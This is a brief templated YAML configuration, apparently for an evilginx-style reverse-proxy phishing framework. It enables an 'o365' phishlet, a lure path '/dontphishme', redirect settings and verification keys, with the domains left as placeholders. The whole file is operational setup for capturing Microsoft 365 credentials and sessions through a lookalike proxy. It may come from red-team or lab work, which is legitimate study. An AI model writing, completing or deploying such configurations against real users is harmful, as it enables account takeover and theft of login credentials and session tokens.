ip: 0.0.0.0
lures:
- info: "test"
  og_desc: ""
  og_image: ""
  og_title: ""
  og_url: ""
  params: {}
  path: /dontphishme
  phishlet: o365
  redirect_url: https://{{ redirect_domain }}
redirect_key: ia
redirect_url: https://{{ redirect_domain }}
server: {{ cdn_domain }}
site_domains:
  o365: {{ cdn_domain }}
sites_enabled:
- o365
verification_key: cj
verification_token: 3ee7